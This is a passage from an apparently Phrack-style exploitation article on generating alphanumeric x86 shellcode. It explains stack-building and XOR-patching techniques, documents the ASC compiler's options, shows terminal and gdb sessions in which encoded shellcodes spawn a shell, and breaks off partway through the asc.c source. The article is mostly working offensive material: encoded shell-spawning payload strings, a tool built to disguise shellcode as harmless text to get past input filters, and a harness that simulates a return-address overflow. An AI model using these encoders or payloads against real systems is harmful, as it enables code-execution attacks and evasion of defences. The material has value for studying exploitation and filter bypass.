"+esi" SIB ADDRESSES. - SOME "+2*" SIB ADDRESSES. - NO "+4*" OR "+8*" SIB ADDRESSES. Also remember that the usual bytes order for a full instruction with possibly ModR/M, SIB byte and disp8/disp32 is: [Mode R/M byte] [] [/] THE "XOR" INSTRUCTION: We notice that we have some possibilities for the XOR instruction. Let's remember briefly all possible logical combinations: a | b | a XOR b (=c) --+---+------------- 0 | 0 | 0 0 | 1 | 1 1 | 0 | 1 1 | 1 | 0 What can we deduct of this? - a XOR a = 0 => we can easily initialize registers to 0. - 0 XOR b = b => we can easily load values in registers containing 0. - 1 XOR b = NOT b => we can easily invert values using registers containing 0xFFFFFFFF. - a XOR b = c b XOR c = a a XOR c = b => we can easily find a byte's XOR complement. ----| Classic manipulations Now, we are going to see various methods permitting to achieve a maximum of usual low level manipulations from the authorized instructions listed above. INITIALIZING REGISTERS WITH PARTICULAR VALUES: First of all, let's think about a method allowing us to initialize some very useful particular values in our registers, like 0 or 0xFFFFFFFF (see alphanumeric_initialize_registers() in asc.c). For example: push 'aaaa' ; 'a' 'a' 'a' 'a' pop eax ;EAX now contains 'aaaa'. xor eax,'aaaa' ;EAX now contains 0. dec eax ;EAX now contains 0xFFFFFFFF. We are going to memorize those special values in particular registers, to be able to use them easily. INITIALIZING ALL REGISTERS: At the beginning of our shellcode, we will need to initialize several registers with values that we will probably use later. Don't forget that we can't use POP with all registers (only EAX,ECX and EDX) We will then use POPAD. For example, if we suppose EAX contain 0 and ECX contain 'aaaa', we can initialize all our registers easily: push eax ;EAX will contain 0. push ecx ;no change to ECX ('aaaa'). push esp ;EDX will contain ESP after POPAD. push eax ;EBX will contain 0. push esp ;no change to ESP. push ebp ;no change to EBP. push ecx ;ESI will contain 'aaaa' after POPAD. dec eax ;EAX will contain 0xFFFFFFFF. push eax ;EDI will contain 0xFFFFFFFF. popad ;we get all values from the stack. COPYING FROM REGISTERS TO REGISTERS: Using POPAD, we can also copy data from any register to any register, if we can't PUSH/POP directly. For example, copying EAX to EBX: push eax ;no change. push ecx ;no change. push edx ;no change. push eax ;EBX will contain EAX after POPAD. push eax ;no change (ESP not "poped"). push ebp ;no change. push esi ;no change. push edi ;no change. popad Let's note that the ESP's value is changed before the PUSH since we have 2 PUSH preceding it, but POPAD POP all registers except ESP from the stack. SIMULATING A "NOT" INSTRUCTION: By using XOR, we can easily realize a classical NOT instruction. Suppose EAX contains the value we want to invert, and EDI contains 0xFFFFFFFF: push eax ;we push the value we want to invert. push esp ;we push the offset of the value we ; pushed on the stack. pop ecx ;ECX now contains this offset. xor [ecx],edi ;we invert the value. pop eax ;we get it back in EAX. READING BYTES FROM MEMORY TO A REGISTER: Once again, by using XOR and the 0 value (here in EAX), we can read an arbitrary byte into DH: push eax ;we push 0 on the stack. pop edx ;we get it back in ECX (DH is now 0). xor dh,[esi] ;we read our byte using [esi] as source ;address. We can also read values not far from [esp] on the stack, by using DEC/INC on ESP, and then using a classical POP. WRITING ALPHANUMERIC BYTES TO MEMORY: If we need a small place to write bytes, we can easily use PUSH and write our bytes by decreasing memory addresses and playing with INC on ESP. push 'cdef' ; 'c' 'd' 'e' 'f' push 'XXab' ; 'X' 'X' 'a' 'b' 'c' 'd' 'e' 'f' inc esp ; 'X' 'a' 'b' 'c' 'd' 'e' 'f' inc esp ; 'a' 'b' 'c' 'd' 'e' 'f' Now, ESP points at a "abcdef" string written on the stack... We can also use the 016 instruction prefix to directly push a 16 bits value: push 'cdef' ; 'c' 'd' 'e' 'f' push 'ab' ; 'a' 'b' 'c' 'd' 'e' 'f' ----| The methods Now, let's combine some of these interesting manipulations to effectively generate alphanumeric shellcodes . We are going to generate an alphanumeric engine, that will build our original (non-alphanumeric) shellcode. We will propose 2 different techniques: USING THE STACK: Because we have a set of instructions related to the stack, we are going to use them efficiently. In fact, we are going to construct our original code gradually while pushing values on the stack, from the last byte (B1) of our original shellcode to the first one (see alphanumeric_stack_generate() and "-m stack" option in asc.c): .... 00 00 00 00 00 00 00 00 00 00 00 00 SS SS SS SS .... .... 00 00 00 00 00 00 00 00 00 00 B2 B1 SS SS SS SS .... <----- .... 00 00 00 00 00 00 00 B5 B4 B3 B2 B1 SS SS SS SS .... <----------------- .... 00 00 00 B9 B8 B7 B6 B5 B4 B3 B2 B1 SS SS SS SS .... <-------original shellcode-------- Where: SS represents bytes already present on the stack. 00 represents non used bytes on the stack. Bx represents bytes of our original non-alphanumeric shellcode. It is really easy, because we have instructions to push doublewords or words, and we can also play with INC ESP to simply push a byte. The problem is that we cannot directly push non-alphanumeric bytes. Let's try to classify bytes of our original code in different categories. (see alphanumeric_stack_get_category() in asc.c). We can thus write tiny blocks of 1,2,3 or 4 bytes from the same category on the stack (see alphanumeric_stack_generate_push() in asc.c). Let's observe how to realize that: - CATEGORY_00: We suppose the register (,,) contains the 0xFFFFFFFF value. 1 BYTE: inc ; now contains 0. push ; 00 00 inc esp ; 00 dec ; now contains 0xFFFFFFFF. 2 BYTES: inc ; now contains 0. push ; 00 00 dec ; now contains 0xFFFFFFFF. 3 BYTES: inc ; now contains 0. push ; 00 00 00 00 inc esp ; 00 00 00 dec ; now contains 0xFFFFFFFF. 4 BYTES: inc ; now contains 0. push ; 00 00 00 00 dec ; now contains 0xFFFFFFFF. - CATEGORY_FF: We use the same mechanism as for CATEGORY_00, except that we don't need to INC/DEC the register containing 0xFFFFFFFF. - CATEGORY_ALPHA: We simply push the alphanumeric values on the stack, possibly using a random alphanumeric byte "??" to fill the doubleword or the word. 1 BYTE: push 0x??B1 ; ?? B1 inc esp ; B1 2 BYTES: push 0xB2B1 ; B2 B1 3 BYTES: push 0x??B3B2B1 ; ?? B3 B2 B1 inc esp ; B3 B2 B1 4 BYTES: push 0xB4B3B2B1 ; B4 B3 B2 B1 - CATEGORY_XOR: We choose random alphanumeric bytes X1,X2,X3,X4 and Y1,Y2,Y3,Y4, so that X1 xor Y1 = B1, X2 xor Y2 = B2, X3 xor Y3 = B3 and X4 xor Y4 = B4 (see alphanumeric_get_complement() in asc.c). 1 BYTE: push 0x??X1 ; ?? X1 pop ax ;AX now contains 0x??X1. xor ax,0x??Y1 ;AX now contains 0x??B1. push ax ; ?? B1 inc esp ; B1 2 BYTES: push 0xX2X1 ; X2 X1 pop ax ;AX now contains 0xX2X1. xor ax,0xY2Y1 ;AX now contains 0xB2B1. push ax ; B2 B1 3 BYTES: push 0x??X3X2X1 ; ?? X3 X2 X1 pop eax ;EAX now contains 0x??X3X2X1. xor eax,0x??Y3Y2Y1 ;EAX now contains 0x??B3B2B1. push eax ; ?? B3 B2 B1 inc eax ; B3 B2 B1 4 BYTES: push 0xX4X3X2X1 ; X4 X3 X2 X1 pop eax ;EAX now contains 0xX4X3X2X1. xor eax,0xY4Y3Y2Y1 ;EAX now contains 0xB4B3B2B1. push eax ; B4 B3 B2 B1 - CATEGORY_ALPHA_NOT and CATEGORY_XOR_NOT: We simply generate CATEGORY_ALPHA and CATEGORY_XOR bytes (N1,N2,N3,N4) by realizing a NOT operation on the original value. We must then cancel the effect of this operation, by realizing again a NOT operation but this time on the stack (see alphanumeric_stack_generate_not() in asc.c). 1 BYTE: push esp pop ecx ;ECX now contains ESP. ; N1 xor [ecx], ; B1 2 BYTES: push esp pop ecx ;ECX now contains ESP. ; N2 N1 xor [ecx], ; B2 B1 3 BYTES: push esp pop ecx ;ECX now contains ESP. ; N3 N2 N1 dec ecx ; ?? N3 N2 N1 xor [ecx], ; ?? B3 B2 B1 inc ecx ; B3 B2 B1 4 BYTES: push esp pop ecx ;ECX now contains ESP. ; N4 N3 N2 N1 xor [ecx], ; B4 B3 B2 B1 While adding each of these small codes, with the appropriate values, to our alphanumeric shellcode, we'll generate an alphanumeric shellcode wich will build our non-alphanumeric shellcode on the stack. USING "XOR PATCHES": Another possibility is to take advantage of an interesting addressing mode, using both ModR/M and SIB bytes in combination with the following XOR instruction (see alphanumeric_patches_generate_xor() and "-m patches" option in asc.c): xor [+2*+], xor [+2*+], xor [+2*+], Suppose we have such an architecture for our shellcode: [initialization][patcher][ data ] We can initialize some values and registers in [initialization], then use XOR instructions in [patcher] to patch bytes in [data]: (see alphanumeric_patches_generate() in asc.c) [initialization][patcher][original non-alphanumeric shellcode] To use this technique, we need to know the starting address of our shellcode. We can store it in a register, like EBX or EDI. We must then calculate the offset for the first non-alphanumeric byte to patch, and generate this offset again by using an register and an alphanumeric value: [initialization][patcher][original non-alphanumeric shellcode] | | +2*+ The main issue here is that our offset is going to depend on the length of our [initialization] and [patcher]. Besides, this offset is not necessarily alphanumeric. Therefore, we'll generate this offset in [initialization], by writing it on the stack with our previous technique. We'll try to generate the smallest possible [initialization], by increasing gradually an arbitrary offset, trying to store the code to calculate it in [initialization], and possibly add some padding bytes (see alphanumeric_patches_generate_initialization() in asc.c): First iteration: [######################][patcher][data] | offset [code to generate this offset] => too big. Second iteration: [##########################][patcher][data] | --->offset [ code to generate this offset ] => too big. Nth iteration: [#######################################][patcher][data] | ---------------->offset [ code to generate this offset ] => perfect. Adding some padding bytes: [#######################################][patcher][data] | ---------------->offset [ code to generate this offset ][padding] => to get the exact size. And finally the compiled shellcode: [ code to generate the offset ][padding][patcher][data] We will also iterate on the value, because some values can give us an easy offset to generate. What will contain the [data] at runtime ? We will use exactly the same manipulations as for the "stack technique", except that here, we can (we MUST !!!) have directly stored alphanumeric values in our [data]. Another problem is that we can only use , or registers. It prevents us to patch 3 bytes with only one XOR instruction without modifying previous or next bytes. Finally, once we patched some bytes, we must increment our offset to reach the next bytes that we need to patch. We can simply increment our , or increment our value if is always alphanumeric. To finish this description of the techniques, let's remember again that we cannot use all registers and addressing modes... We can only use the ones that are "alphanumeric compatibles". For example, in the "XOR patching technique", we decided to use the following registers: = ebx | edi = ebp XOR register = eax | ecx NOT register = dl | dh | edx | esi Let's note that those registers are randomly allocated, to add some basic polymorphism abilities (see alphanumeric_get_register() in asc.c). ----| Some architectures and considerations Now, we will analyze different general architectures and considerations to generate alphanumeric shellcodes. For the "XOR patching technique", the only constraint is that we need to know the address of our shellcode. Usually this is trivial: we used this address to overflow a return address. For example, if we overwrote a return value, we can easily recover it at the beginning of our shellcode (see alphanumeric_get_address_stack() and "-a stack" option in asc.c): dec esp dec esp dec esp dec esp pop The address can also be stored in a register (see "-a " option in asc.c). In this case, no preliminary manipulation will be necessary. For the "stack technique", we can have different interesting architectures, depending on the position of the buffer we try to smash. Let's analyze some of them briefly. If our shellcode is on the stack, followed by a sufficient space and by a return address, this is really perfect. Let's look at what is going to happen to our stack: .... AA AA AA AA 00 00 00 00 00 00 RR RR RR RR SS SS .... [EIP] [ESP] .... AA AA AA AA 00 00 00 00 00 00 RR BB BB BB SS SS .... -->[EIP] [ESP]<--------- Our non-alphanumeric shellcode gets down to meet the end of our compiled shellcode. Once we have built our entire original shellcode, we can simply build padding instructions to connect both shellcodes. .... AA AA AA AA PP PP PP PP PP PP RR BB BB BB SS SS .... ------>[EIP] [ESP]<------------------------------------- .... AA AA AA AA PP PP PP PP PP PP RR BB BB BB SS SS .... -------------------------------------->[EIP] Where: AA represents bytes of our alphanumeric compiled shellcode. 00 represents non used positions on the stack. SS represents bytes already present on the stack. RR represents bytes of our return address. BB represents bytes of ou non-alphanumeric generated shellcode. PP represents bytes of simple padding instructions (ex: INC ECX). To use this method, we must have an original shellcode with a smaller size compared to the space between the end of our compiled shellcode and the value of ESP at the beginning of the execution of our shellcode. We must also be sure that the last manipulations on the stack (to generate padding instructions) will not overwrite the last instructions of our compiled shellcode. If we simply generate alphanumeric padding instructions, it should not make any problems. We can also add some padding instructions at the end of our alphanumeric compiled shellcode, and let them be overwritten by our generated padding instructions. This approach is interesting for brute forcing (see "-s null" option in asc.c). We can also proceed in a slightly different way, if the space between our compiled shellcode and the original shellcode has an alphanumeric length ( alphanumeric). We simply use 2 inverse conditional jumps, like this: [end of our compiled shellcode] jo +1 -+ | jno --+ | ... | | label: <-------+ [begin of our original non-alphanumeric shellcode] We can also combine "stack" and "patches" techniques. We build our original shellcode on the stack (1), and simply jump to it once built (3). The problem is that we don't have alphanumeric jump instructions. We'll generate a JMP ESP simply by using the "patches technique" (2) on one byte (see "-s jmp" option in asc.c): +--patch (2)-+ | | [non-alphanumeric building code][JMP ESP patching code][jmp esp] | | +-------------+---------jump (3)------------------------------+ | | | build (1) | | +-> [non-alphanumeric code] We can also replace the JMP ESP by the following sequence, easier to generate (see "-s ret" option in asc.c): push esp ret Finally, we can generate yet another style of shellcode. Suppose we have a really big non-alphanumeric shellcode. Perhaps is it more interesting to compress it, and to write a small non-alphanumeric decompression engine (see "-s call" option in asc.c): +--patch (2)--+ | | [non-alphanumeric building code][CALL ESP patching code][call esp][data] | | +-------------+---------call (3)--------------------------------+ | | | build (1) | | | <---------+--------------------------------> | +-> [pop ][decompression engine][jmp ] (4) (5) (6) Once the CALL ESP is executed (3), the address of [data] is pushed on the stack. The engine only has to pop it in a register (4), can then decompress the data to build the original shellcode (5), and finally jump to it (6). As we can see it, possibilities are really endless! ----| ASC, an Alphanumeric Shellcode Compiler ASC offers some of the techniques proposed above. What about the possible options? COMPILATION OPTIONS: These options allow us to specify the techniques and architecture the alphanumeric shellcode will use to build the original shellcode. -a[ddress] stack| : allows to specify the start address of the shellcode (useful for patching technique). "stack" means we get the address from the stack. allows to specify a register containing this starting address. -m[ode] stack|patches : allows to choose the type of alphanumeric shellcode we want to generate. "stack" generates our shellcode on the stack. "patches" generates our shellcode by XOR patching. -s[tack] call|jmp|null|ret : specifies the method (if "-m stack") to return to the original shellcode on the stack. "call" uses a CALL ESP instruction. "jmp" uses a JMP ESP instruction. "null" doesn't return to the code (if the original code is right after the alphanumeric shellcode). "ret" uses PUSH ESP and RET instructions. DEBUGGING OPTIONS: These options permit us to insert some breakpoints (int3), and observe the execution of our alphanumeric shellcode. -debug-start : inserts a breakpoint to the start of the compiled shellcode. -debug-build-original : inserts a breakpoint before to build the original shellcode. -debug-build-jump : inserts a breakpoint before to build the jump code (if we specified the -s option). Useless if "-s null". -debug-jump : inserts a breakpoint before to run the jump instruction (if we specified the -s option). If "-s null", the breakpoint will simply be at the end of the alphanumeric shellcode. -debug-original : inserts a breakpoint to the beginning of the original shellcode. This breakpoint will be build at runtime. INPUT/OUTPUT OPTIONS: -c[har] : specifies a C variable name where a shellcode is stored: char array[]= "blabla" /* my shellcode */ "blabla"; If no name is specified and several char[] arrays are present, the first one will be used. The parsing recognizes C commentaries and multi-lines arrays. This option also assure us that the input file is a C file, and not a binary file. -f[ormat] bin|c : specifies the output file format. If C format is chosen, ASC writes a tiny code to run the alphanumeric shellcode, by simulating a RET address overflow. This code cannot run correctly if "-a " or "-s null" options were used. -o[utput] : allows to specify the output filename. EXAMPLES: Let's finish with some practical examples, using shellcodes from nice previous Phrack papers ;) First, have a look at P49-14 (Aleph One's paper). The first shellcode he writes (testsc.c) contain 00 bytes (normally not a problem for ASC). We generate a C file and an alphanumeric shellcode, using "XOR patches": rix@debian:~/phrack$ ./asc -c shellcode -f c -o alpha.c p49-14 Reading p49-14 ... (61 bytes) Shellcode (390 bytes): LLLLYhb0pLX5b0pLHSSPPWQPPaPWSUTBRDJfh5tDSRajYX0Dka0TkafhN9fYf1Lkb0TkdjfY0Lkf0Tkgfh6rfYf1Lki0tkkh95h8Y1LkmjpY0Lkq0tkrh2wnuX1Dks0tkwjfX0Dkx0tkx0tkyCjnY0LkzC0TkzCCjtX0DkzC0tkzCj3X0Dkz0TkzC0tkzChjG3IY1LkzCCCC0tkzChpfcMX1DkzCCCC0tkzCh4pCnY1Lkz1TkzCCCCfhJGfXf1Dkzf1tkzCCjHX0DkzCCCCjvY0LkzCCCjdX0DkzC0TkzCjWX0Dkz0TkzCjdX0DkzCjXY0Lkz0tkzMdgvvn9F1r8F55h8pG9wnuvjrNfrVx2LGkG3IDpfcM2KgmnJGgbinYshdvD9d Writing alpha.c ... Done. rix@debian:~/phrack$ gcc -o alpha alpha.c rix@debian:~/phrack$ ./alpha sh-2.03$ exit exit rix@debian:~/phrack$ It seems to work perfectly. Let's note the alphanumeric shellcode is also written to stdout. Now, let's compile Klog's shellcode (P55-08). We choose the "stack technique", with a JMP ESP to return to our original shellcode. We also insert some breakpoints: rix@debian:~/phrack$ ./asc -m stack -s jmp -debug-build-jump -debug-jump -debug-original -c sc_linux -f c -o alpha.c P55-08 Reading P55-08 ... (50 bytes) Shellcode (481 bytes): LLLLZhqjj9X5qjj9HPWPPSRPPafhshfhVgfXf5ZHfPDhpbinDfhUFfXf5FifPDSDhHIgGX516poPDTYI11fhs2DTY01fhC6fXf5qvfPDfhgzfXf53EfPDTY01fhO3DfhF9fXf5yFfPDTY01fhT2DTY01fhGofXf5dAfPDTY01fhztDTY09fhqmfXf59ffPDfhPNDfhbrDTY09fhDHfXf5EZfPDfhV4fhxufXf57efPDfhl5DfhOSfXf53AfPDfhV4fhFafXf5GzfPDfhxGDTY01fh4IfXf5TFfPDfh7VDfhhvDTY01fh22fXf5m5fPDfh3VDfhWvDTY09fhKzfXf5vWfPDTY01fhe3Dfh8qfXf5fzfPfhRvDTY09fhXXfXf5HFfPDfh0rDTY01fhk5fXf5OkfPfhwPfXf57DfPDTY09fhz3DTY09SQSUSFVDNfhiADTY09WRa0tkbfhUCfXf1Dkcf1tkc3UX Writing alpha.c ... Done. rix@debian:~/phrack$ gcc -o alpha alpha.c rix@debian:~/phrack$ gdb alpha GNU gdb 19990928 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... (no debugging symbols found)... (gdb) run Starting program: /home/rix/phrack/alpha (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGTRAP, Trace/breakpoint trap. 0xbffffb1d in ?? () ;-debug-build-jump (gdb) x/22i 0xbffffb1d 0xbffffb1d: push %ebx 0xbffffb1e: push %ecx 0xbffffb1f: push %ebx ;EDX will contain 0xFFFFFFFF 0xbffffb20: push %ebp 0xbffffb21: push %ebx 0xbffffb22: inc %esi ;ESI contains 0xFFFFFFFF. 0xbffffb23: push %esi ;ESI contains 0. 0xbffffb24: inc %esp ;00 00 00 on the stack. 0xbffffb25: dec %esi ;restores ESI. 0xbffffb26: pushw $0x4169 ;push an alphanumeric word. 0xbffffb2a: inc %esp ;an alphanumeric byte on the ; stack. 0xbffffb2b: push %esp 0xbffffb2c: pop %ecx ;ECX contains ESP (the ; address of the byte). 0xbffffb2d: xor %bh,(%ecx) ;NOT on this byte (EBP will ; contain the dword offset). 0xbffffb2f: push %edi ;ESI will contain 0xFFFFFFFF 0xbffffb30: push %edx 0xbffffb31: popa 0xbffffb32: xor %dh,0x62(%ebx,%ebp,2) ;NOT on the first byte to ; patch (our 0xCC, int3). ; Let's note the use of ; alphanumeric , the ; use of EBX (address of our ; shellcode) and the use of ; EBP (the previously stored ; offset). 0xbffffb36: pushw $0x4355 0xbffffb3a: pop %ax ;AX contains 0x4355. 0xbffffb3c: xor %ax,0x63(%ebx,%ebp,2) ;XOR the next 2 bytes ; ( is now 0x63). 0xbffffb41: xor %si,0x63(%ebx,%ebp,2) ;NOT these 2 bytes. (gdb) x/3bx 0xbffffb41+5 ;O16 + XOR + ModR/M + ; SIB + = 5 bytes 0xbffffb46: 0x33 0x55 0x58 ;The 3 bytes we patched: ; NOT 0x33 = 0xCC => INT 3 ; NOT (0x55 XOR 0x55) = 0xFF ; NOT (0x43 XOR 0x58) = 0xE4 ; => JMP ESP (gdb) cont Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0xbffffb47 in ?? () ;-debug-jump (gdb) x/1i 0xbffffb47 0xbffffb47: jmp *%esp ;our jump (gdb) info reg esp esp 0xbffffd41 -1073742527 (gdb) cont ;Let's run this JMP ESP. Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0xbffffd42 in ?? () ;(previous ESP)+1 ; (because of our INT3). We ; are now in our original ; shellcode. (gdb) cont ;Let's run it ;) Continuing. sh-2.03$ exit ;Finally!!! exit (no debugging symbols found)...(no debugging symbols found)... Program exited normally. (gdb) ----| Conclusion Writing IA32 alphanumeric shellcodes is finally easily possible. But using only alphanumeric addresses is less obvious. In fact, this is the main problem met when we simply want to use alphanumeric chars. In some particular cases, it will however be possible. We'll try to return to instructions that will themselves return to our shellcode. For example, on Win32 systems, we can sometimes meet interesting instructions at addresses like 0x0041XXXX (XX are alphanumeric chars). So we can generate such return addresses. Partial overwriting of addresses is sometimes also interesting, because we can take advantage of bytes already present on the stack, and mainly take advantage of the null byte (that we cannot generate), automatically copied at the end of the C string. Note that, sometimes, depending on what we try to exploit, we can use some others chars, for example '_', '@', '-' or such classical characters. It is obvious, in such cases, that they will be very precious. The "stack technique" seems to need an executable stack... But we can modify ESP's value at the beginning of our shellcode, and get it point to our heap, for example. Our original shellcode will then be written to the heap. However, we need to patch the POP ESP instruction, because it's not "alphanumeric compliant". Except, the size (it will possibly lead to some problems), we also must mention another disadvantages of those techniques: compiled shellcodes are vulnerable to toupper()/tolower() conversions. Writing an alphanumeric and toupper()/tolower() resistant shellcode is nearly an impossible task (remember the first array, with usable instructions). This paper shows that, contrary to received ideas, an executable code can be written, and stored nearly everywhere. Never trust anymore a string that looks perfectly legal: perhaps is it a well disguised shellcode ;) Thanks and Hello to (people are alphanumerically ordered :p ): - Phrack staff. - Devhell, HERT & TESO guys: particularly analyst, binf, gaius, mayhem, klog, kraken & skyper. - dageshi, eddow, lrz, neuro, nite, obscurer, tsychrana. rix@hert.org ----| Code This should compile fine on any Linux box with "gcc -o asc asc.c". It is distributed under the terms of the GNU GENERAL PUBLIC LICENSE. If you have problems or comments, feel free to contact me (rix@hert.org). <++> asc.c !707307fc /****************************************************************************** * ASC : IA 32 Alphanumeric Shellcode Compiler * ****************************************************************************** * * VERSION: 0.9.1 * * * LAST UPDATE: Fri Jul 27 19:42:08 CEST 2001 * * * LICENSE: * ASC - Alphanumeric Shellcode Compiler * * Copyright 2000,2001 - rix * * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * * TODO: * - create LibASC, a library containing all functions. * - permit specification of acceptable non-alphanumeric chars. * - generate padding instructions sequences. * - encode alphanumeric chars, to avoid pattern matching. * - insert junk instructions (polymorphic stuff) and modify existing. * - optimize "patch technique" when offset < 256 and is alphanumeric. * - automatically calculate padding size for "stack without jump" technique. * - C output format: simulate addresses in register, padding,... * - use constant address for compiled shellcode. * - modify ESP starting address for "stack technique". * - simple shellcode formats conversion mode (no compilation). * - insert spaces and punctuation to imitate classical sentences. * * * CONTACT: rix * ******************************************************************************/ #include #include #include #include #include /* +------------------------------------------------------------------------+ */ /* | RANDOM NUMBERS FUNCTIONS | */ /* +------------------------------------------------------------------------+ */ /* initialize the pseudo-random numbers generator */ /* ============================================== */ void random_initialize() { srand((unsigned int)time(0)); } /* get a random integer i (0<=iopcodes=NULL; ret->size=0; } return ret; } /* initialize an existing Sshellcode structure */ /* =========================================== */ void shellcode_zero(struct Sshellcode *shellcode) { if (shellcode==NULL) return; if (shellcode->opcodes!=NULL) free(shellcode->opcodes); shellcode->opcodes=NULL; shellcode->size=0; } /* free an existing Sshellcode structure */ /* ===================================== */ void shellcode_free(struct Sshellcode *shellcode) { if (shellcode!=NULL) { shellcode_zero(shellcode); free(shellcode); } } /* return an allocated string from an existing Sshellcode */ /* ====================================================== */ char *shellcode_malloc_string(struct Sshellcode *shellcode) { char *ret; if (shellcode==NULL) return NULL; if (shellcode->opcodes==NULL) return ""; if ((ret=(char*)malloc(shellcode->size+1))==NULL) return NULL; memcpy(ret,shellcode->opcodes,shellcode->size); ret[shellcode->size]=0; return ret; } /* overwrite an existing Sshellcode with a Sshellcode */ /* ================================================== */ struct Sshellcode *shellcode_cpy(struct Sshellcode *destination,struct Sshellcode *source) { if (destination==NULL) return NULL; shellcode_zero(destination); if (source!=NULL) { if (source->opcodes!=NULL) { /* if source contains a shellcode, we copy it */ if ((destination->opcodes=(unsigned char*)malloc(source->size))==NULL) return NULL; memcpy(destination->opcodes,source->opcodes,source->size); destination->size=source->size; } } return destination; } /* append a Sshellcode at the end of an existing Sshellcode */ /* ======================================================== */ struct Sshellcode *shellcode_cat(struct Sshellcode *destination,struct Sshellcode *source) { if (destination==NULL) return NULL; if (destination->opcodes==NULL) shellcode_cpy(destination,source); else { /* destination already contains a shellcode */ if (source!=NULL) { if (source->opcodes!=NULL) { /* if source contain a shellcode, we copy it */ if ((destination->opcodes=(unsigned char*)realloc(destination->opcodes,destination->size+source->size))==NULL) return NULL; memcpy(destination->opcodes+destination->size,source->opcodes,source->size); destination->size+=source->size; } } } return destination; } /* add a byte at the end of an existing Sshellcode */ /* =============================================== */ struct Sshellcode *shellcode_db(struct Sshellcode *destination,unsigned char c) { struct Sshellcode *ret,*tmp; /* build a tiny one byte Sshellcode */ tmp=shellcode_malloc(); if ((tmp->opcodes=(unsigned char*)malloc(1))==NULL) return NULL; tmp->opcodes[0]=c; tmp->size=1; /* copy it at the end of the existing Sshellcode */ ret=shellcode_cat(destination,tmp); shellcode_free(tmp); return ret; } /* read a Sshellcode from a binary file */ /* ==================================== */ int shellcode_read_binary(struct Sshellcode *shellcode,char *filename) { FILE *f; int size; if (shellcode==NULL) return -1; if ((f=fopen(filename,"r+b"))==NULL) return -1; fseek(f,0,SEEK_END); size=(int)ftell(f); fseek(f,0,SEEK_SET); if ((shellcode->opcodes=(unsigned char*)realloc(shellcode->opcodes,shellcode->size+size))==NULL) return -1; if (fread(shellcode->opcodes+shellcode->size,size,1,f)!=1) { shellcode_zero(shellcode); return -1; } shellcode->size+=size; fclose(f); return shellcode->size; } /* read a Sshellcode from a C file */ /* =============================== */ #define LINE_SIZE 80*256 #define HEXADECIMALS "0123456789ABCDEF" int shellcode_read_C(struct Sshellcode *shellcode,char *filename,char *variable) { FILE *f; struct Sshellcode *binary; unsigned char *hex,*p,c; int i; if (shellcode==NULL) return -1; hex=HEXADECIMALS; binary=shellcode_malloc(); if (shellcode_read_binary(binary,filename)==-1) { shellcode_free(binary); return -1; } shellcode_db(binary,0); /* for string searching */ p=binary->opcodes; while (p=strstr(p,"char ")) { /* "char " founded */ p+=5; while (*p==' ') p++; if (!variable) { /* if no variable was specified */ while ((*p!=0)&&(*p!='[')) p++; /* search for the '[' */ if (*p==0) { shellcode_free(binary); return -1; } } else { /* a variable was specified */ if (memcmp(p,variable,strlen(variable))) continue; /* compare the variable */ p+=strlen(variable); if (*p!='[') continue; } /* *p='[' */ p++; if (*p!=']') continue; /* *p=']' */ p++; while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++; if (*p!='=') continue; /* *p='=' */ p++; while (1) { /* search for the beginning of a "string" */ while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++; while ((*p=='/')&&(*(p+1)=='*')) { /* loop until the beginning of a comment */ p+=2; while ((*p!='*')||(*(p+1)!='/')) p++; /* search for the end of the comment */ p+=2; while ((*p==' ')||(*p=='\r')||(*p=='\n')||(*p=='\t')) p++; } if (*p!='"') break; /* if this is the end of all "string" */ /* *p=begin '"' */ p++; while (*p!='"') { /* loop until the end of the "string" */ if (*p!='\\') { shellcode_db(shellcode,*p); } else { /* *p='\' */ p++; if (*p=='x') { /* *p='x' */ p++; *p=toupper(*p); for (i=0;isize; } shellcode_free(binary); return -1; } /* write a Sshellcode to a binary file */ /* =================================== */ int shellcode_write_binary(struct Sshellcode *shellcode,char *filename) { FILE *f; if (shellcode==NULL) return -1; if ((f=fopen(filename,"w+b"))==NULL) return -1; if (fwrite(shellcode->opcodes,shellcode->size,1,f)!=1) return -1; fclose(f); return shellcode->size; } /* write a Sshellcode to a C file */ /* ============================== */ int shellcode_write_C(struct Sshellcode *shellcode,char *filename) { FILE *f; char *tmp; int size; if (shellcode==NULL) return -1; if ((tmp=shellcode_malloc_string(shellcode))==NULL) return -1; if ((f=fopen(filename,"w+b"))==NULL) return -1; fprintf(f,"char shellcode[]=\"%s\";\n",tmp); free(tmp); fprintf(f,"\n"); fprintf(f,"int main(int argc, char **argv) {\n"); fprintf(f," int *ret;\n"); size=1; while (shellcode->size*2>size) size*=2; fprintf(f," char buffer[%d];\n",size); fprintf(f,"\n"); fprintf(f," strcpy(buffer,shellcode);\n"); fprintf(f," ret=(int*)&ret+2;\n"); fprintf(f," (*ret)=(int)buffer;\n"); 